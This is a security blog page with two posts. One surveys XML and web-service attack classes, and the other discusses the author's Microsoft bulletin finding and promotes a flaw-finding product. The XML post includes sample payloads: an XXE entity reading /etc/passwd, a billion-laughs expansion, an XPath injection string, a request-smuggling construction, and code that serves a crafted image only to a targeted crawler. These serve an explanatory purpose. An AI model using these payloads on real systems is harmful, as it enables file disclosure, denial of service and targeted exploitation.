Posts Tagged dime

The “X” Files


It’s been a little while since we last posted, so I wanted to get a blog out there to let everybody know we’re still alive! We just finalized the XML schema for our soon-to-be-released BlockWatch product, and with all the XML tags, elements, attributes, and such running through my head, I figured I’d blog about XML security. I’m sure the majority of penetration testers out there routinely test for the traditional web application vulnerabilities when looking at Web Services. The same old authentication/authorization weaknesses, faulty encoding/re-encoding/re-decoding, session management issues, et al. are still all there, and it’s not uncommon for a SOAP Web Service to hand off an attack string to some middleware app that forwards it deep into the internal network for handling by the revered legacy mainframe. Some organizations process so much XML over HTTP that they place XML accelerator devices on their network perimeter. I have a feeling this trend will increase the number of private-IP web servers that feel the effects of HTTP Request Smuggling.
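For readers who haven’t bumped into HTTP Request Smuggling before, here’s a rough sketch (in Python, just to keep the byte counting honest) of the classic request-parsing ambiguity it exploits. Everything in it is hypothetical: the host names, the path, and the assumption that a front-end device honors the first Content-Length header while the back-end server honors the second.

    # Builds (but does not send) a request whose body length is ambiguous.
    # If a hypothetical front end trusts the first Content-Length (0) and the
    # back end trusts the second, the trailing bytes are interpreted by the
    # back end as the start of a second, "smuggled" request.
    smuggled = (
        b"GET /internal/admin HTTP/1.1\r\n"   # made-up internal resource
        b"Host: internal.example\r\n"
        b"\r\n"
    )
    outer = (
        b"POST /xml/service HTTP/1.1\r\n"     # made-up front-end endpoint
        b"Host: accelerator.example\r\n"
        b"Content-Length: 0\r\n"
        + ("Content-Length: %d\r\n" % len(smuggled)).encode()
        + b"\r\n"
        + smuggled
    )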

Additionally, XML parsers that fetch external document references (e.g. remote URIs embedded in tag attributes) open themselves up to client-side attacks from evil web servers. Crafted file attachments can come in the form of a SOAP DIME attachment or the traditional multipart HTTP POST file upload. With those things in mind, Philippe Lagadec’s ExeFilter talk from CanSecWest 2008 made some pretty good points on why verifying filename extensions and file header contents or magic numbers isn’t always good enough.
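To illustrate that last point with a quick, hypothetical sketch: a file can begin with a perfectly valid image signature and still carry something else entirely in its body, so a filter that only looks at the extension and the magic number will happily wave it through. The payload below is just a stand-in, not a working attack.

    # A file that starts with a valid GIF signature but is not a benign image.
    polyglot = b"GIF87a" + b"\x01\x00\x01\x00" + b"<script>alert(1)</script>"

    def looks_like_gif(data: bytes) -> bool:
        # the sort of header/magic-number check that is necessary but not sufficient
        return data[:6] in (b"GIF87a", b"GIF89a")

    assert looks_like_gif(polyglot)  # passes the check anyway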

The new manifestations of these old problems should be cause for concern, but I personally find the newer XML-specific bugs the most exciting. For example: XPath injection, resource exhaustion by infinitely nesting tags against a recursive-descent parser, XXE (XML eXternal Entity) attacks, etc.
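For anyone who hasn’t seen these up close, here are the classic payload shapes, plus the XPath equivalent of string-concatenation SQL injection. None of this is wired to a particular parser; whether the entities below actually get expanded or resolved depends entirely on how the parser is configured.

    # Entity-expansion ("billion laughs") resource exhaustion, truncated for
    # brevity; real payloads nest the entities much deeper.
    billion_laughs = """<?xml version="1.0"?>
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    ]>
    <lolz>&lol3;</lolz>"""

    # XXE: an external general entity that dereferences a local file.
    xxe = """<?xml version="1.0"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <foo>&xxe;</foo>"""

    # XPath injection via naive string concatenation; a username/password of
    # ' or '1'='1 short-circuits the predicate, much like classic SQL injection.
    username = password = "' or '1'='1"
    query = "//user[name/text()='%s' and password/text()='%s']" % (username, password)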

A single file format for everything is supposed to make things simpler, but the lion’s share of real-world implementations over-complicate the humble markup tags to the point where they become a breeding ground for old-school exploits and new attack techniques alike; we’re all familiar with the cliché about a “system of systems” with too many moving parts being doomed to fail. I’ll touch on some more advanced XML attacks later in the post, but first let’s take a step back and remember XML back when it was still fresh and new.

Towards the end of the twentieth century, when I first started taking notice of all the hype surrounding XML (the eXtensible Markup Language), I held a fairly skeptical attitude towards it, as I tend to do with many fledgling technologies and standards. Perhaps I’ve been over-analytical in that respect, but look how long it’s taken IPv6 to amass even a minuscule amount of usage! Granted, a formal data representation grammar certainly was needed in that “dot-bomb” era, a time when mash-up web applications were near impossible to maintain since consistently pattern-matching off-site content demanded continuous tweaking of regular expressions, parsers, etc. The so-called browser war of Netscape Navigator vs. Internet Explorer couldn’t have helped things either. If that was a war, then we must be on the brink of browser Armageddon now that there’s Chromium, Firefox 3, IE8 RTM, Safari 4 Beta, Opera, Konqueror, Amaya, w3m, lynx, etc. The good news? We now have Safari for Win32. The bad news? Microsoft no longer supports IE for Mac OS… bummer.

I think it’s fairly rational to forecast continued adoption of XML Encryption and the WS-* standards for SOAP Web Services that handle business-to-business and other communications protocol vectors. If you’re bored of the same old Tomcat/Xerces, WebLogic/SAX, etc. deployments, then prepare for applications written against newer APIs to arrive soon; namely Microsoft WCF and Oslo, the Windows Communication Foundation API and a modeling platform with design tools (respectively). From the surface of the .NET promotional hype, it appears as if WCF and Oslo will be synthesized into a suite reminiscent of BizTalk Server’s visual process modeling approach. WCF implements many Web Services standards, including WS-Security, but of course not all major software vendors are participating in all of the standards. The crew in Redmond has committed to REST support in WCF, and it wouldn’t surprise me to see innovative XML communications techniques arise from the combination of Silverlight 3 and .NET RIA Services; for those of you who still don’t know, RIA is an acronym for Rich Internet Applications! Microsoft is also leveraging the interoperability of this extensible markup language for the long-proprietary document formats of its Office product suite as part of its Open Specification Promise. Even the Microsoft Interactive Canvas, essentially a table that provides I/O through touch, uses a form of XML (XAML) for markup.

Blogosphereans, Security Twits, and other Netizens alike seem to take this Really Simple Syndication thing for granted. Over the past several years there’s been a trend of malicious payloads piggybacking on banner ads. Since RSS and Atom are capable of syndicating images as well, I’d like to see a case study detailing the impact of a shellcode-toting image referenced from within an XML-based syndication format. Obvious client-side effects when the end user’s browser renders the image are to be expected (gdiplus.dll, anyone?), but what else could be done? Web 2.0 search engines with blog and image search features often pre-process those images into thumbnails as part of the indexing process. A little recon might discover the use of libMagick by one and libgd by another. Targeting one specific spiderbot over another could be done by testing the netmask of the source IP address making the TCP connection to the web server, or perhaps even by simply inspecting the User-Agent field in the HTTP request header. Crafting a payload that functions both before and after image resizing or other additional processing (e.g. EXIF meta-data removal) would be quite an admirable feat. Notwithstanding, I was quite surprised how much Referer traffic our blog got from images.google.com after Shane included a picture of the great Charlie Brown in his “Good Grief!” post… but I digress.
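A purely hypothetical sketch of that targeting step might look something like the following; the netblock and crawler name are invented for illustration, and serving different content to different clients is, of course, exactly the sort of behavior defenders should be watching for.

    from ipaddress import ip_address, ip_network

    CRAWLER_NET = ip_network("192.0.2.0/24")   # placeholder netblock for the indexer
    CRAWLER_UA = "ExampleBot"                  # placeholder crawler User-Agent token

    def pick_image(client_ip: str, user_agent: str) -> str:
        # Serve the crafted image only to the targeted spiderbot; everyone
        # else gets the ordinary banner.
        if ip_address(client_ip) in CRAWLER_NET or CRAWLER_UA in user_agent:
            return "crafted_thumbnail_source.jpg"
        return "ordinary_banner.jpg"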

Several years ago, when I was still living in New York, I became fascinated with the subtle intricacies of XML-DSig while studying some WS-Security literature. XML Signature validation in particular attracted my attention in earnest. In addition to the characteristics of traditional digital signatures, XML Signatures exhibit idiosyncrasies that require a bit of pragmatism to implement properly, and therefore also to verify properly (e.g. by a network security analyst). This is mainly because of the Transform and Reference elements nested within the Signature element: References and Transforms govern the data provided as input to the DigestMethod, which produces the cryptic DigestValue string. A Reference element contains a URI attribute which represents the location of the data to be signed. Depending on the type of Transform element, data first dereferenced from the Reference URI is then transformed (e.g. via an XPath query) prior to signature calculation. That’s essentially how it works. Something that may seem awkward is that the XML being signed can remain exactly the same while the digital signature (e.g. the DigestValue element value) changes. I’ve decided to leave some strange conditions that often come about as an exercise for the reader (a rough sketch of the Reference processing model follows the list):

What happens to an XML Digital Signature if … ?

  • No resource exists at the location referenced by the Reference element’s URI attribute value.
  • A circular reference is formed because a URI attribute value points to another Reference element whose URI attribute value is identical to the first.
  • The URI identifies the Signature element itself.
  • A resource exists at the URI, but it’s empty.
  • The Reference element has a URI attribute value which is an empty string, <Reference URI="">.
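To make the Reference processing model above a little more concrete, here’s a loose, hand-rolled sketch of it; this is not a conforming XML-DSig implementation by any stretch, and canonicalization, real Transform algorithms, and the KeyInfo/SignatureValue side of the story are deliberately left out. The helper names are mine, not from any library.

    import base64
    import hashlib

    def verify_reference(dereference, transforms, expected_digest_b64):
        # Dereference the Reference URI, apply the Transforms in order, digest
        # the result (SHA-1 standing in for the DigestMethod), and compare it
        # against the DigestValue carried in the signature.
        data = dereference()
        for transform in transforms:
            data = transform(data)
        digest = hashlib.sha1(data).digest()
        return base64.b64encode(digest).decode() == expected_digest_b64

    # Hypothetical usage: a reference whose transforms change nothing.
    signed_bytes = b"<PaymentInfo>...</PaymentInfo>"
    expected = base64.b64encode(hashlib.sha1(signed_bytes).digest()).decode()
    ok = verify_reference(lambda: signed_bytes, [], expected)

Each of the questions above boils down to what that dereference step should return (nothing? the Signature element itself? an empty byte string?) and what the verifier is supposed to do with the answer.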


Dimes

Microsoft Security Bulletin

MS08-010 – Critical CVE-2008-0076

None of the flaws I’ve found on Microsoft platforms have ever been public before (that is, they have all come out of internal projects), and it’s nice to see that, at least in this round of fixes, my bug scored a perfect 10.0 (a dime) on the bulletin. I actually did not test as many platforms and configurations as Microsoft did. For those of you who are unaware, bug regression and the overall triage process can become quite intensive. I knew this vulnerability/flaw/bug/exploit/whatever had wide-reaching appeal, which is fairly easy to see from the fact that all architectures and versions, as far back as they go, are marked critical.

As with all doings in the security space, walking the line between disclosure and a tight-lipped, mum’s-the-word practice is not easy. So, what can be said here? Nothing? Something? I guess I have to write something; the marketoids wouldn’t be happy if I did not.

Before I digress into any technical discussion, I’ll take this opportunity to say something about the exploit sales “industry,” if you can call it that. In this world, everything and everybody has their place; that said, any individual who thinks exploits are worth any money has another thing coming. Look at it this way: if you’re in the business of purchasing information (exploits), by definition you are unaware of the value of that information, and thereby inherently in a position to devalue the time and emotional investment that went into deriving it. Which means you’re never going to get back enough cash to make up for your time, EVER!! Where I do see some value in exploit brokers is exclusively in having them take on the burden of dealing with uninformed software vendors (the Microsoft/IBM/others process is fairly straightforward).

Now that that’s all done with, I don’t really want to talk about the exploit, at least until some poorly constructed version winds up in Metasploit. I will say, though, that the bulletin is correct in its description and synopsis.

The fact that no mitigating factors or workarounds are possible gives me some incentive, and some reassurance that the tools and methodologies we’re building into our product offering actually work.

We’re ramping up development for a big push this quarter and will be uploading some more screenshots and related minutiae in the coming months.

Our product, in brief, is an automated tool for native application flaw finding. It assesses, dynamically at runtime, the integrity of a given binary application, and then produces test cases and reproductions of what is necessary to trigger each flaw for a developer (reducing regression rates from bug fixes, since it’s much easier to fix something you can interact with than to act on a simple warning message).

We’re also working on a management interface (on top of the technical one) that will enable the layperson to identify architectural problems in arbitrary software. The idea is actually quite simple (with the support of our engine): a landscape or tomography view is laid out before the user, with peaks and valleys, and it changes over time (a fourth dimension), representing the surface area of your application binary’s response to input; that is, a dynamic environment rooted in a system-of-systems methodology. What becomes apparent (if you are in a position to fix these issues yourself) is that, as time goes on and you assign resources (people) to flatten the peaks into valleys, the rate at which you push down the peaks (bugs) is not constant across the application; some issues are harder to fix than others and persist. In this way, a self-relative understanding of where problem areas of code exist poignantly reveals them as architectural flaws, and appropriate steps can be taken to drive the business case that will support a rewrite.

Whew, that’s a mouthful. Needless to say, we’re working to create the best platform around for software sovereignty.

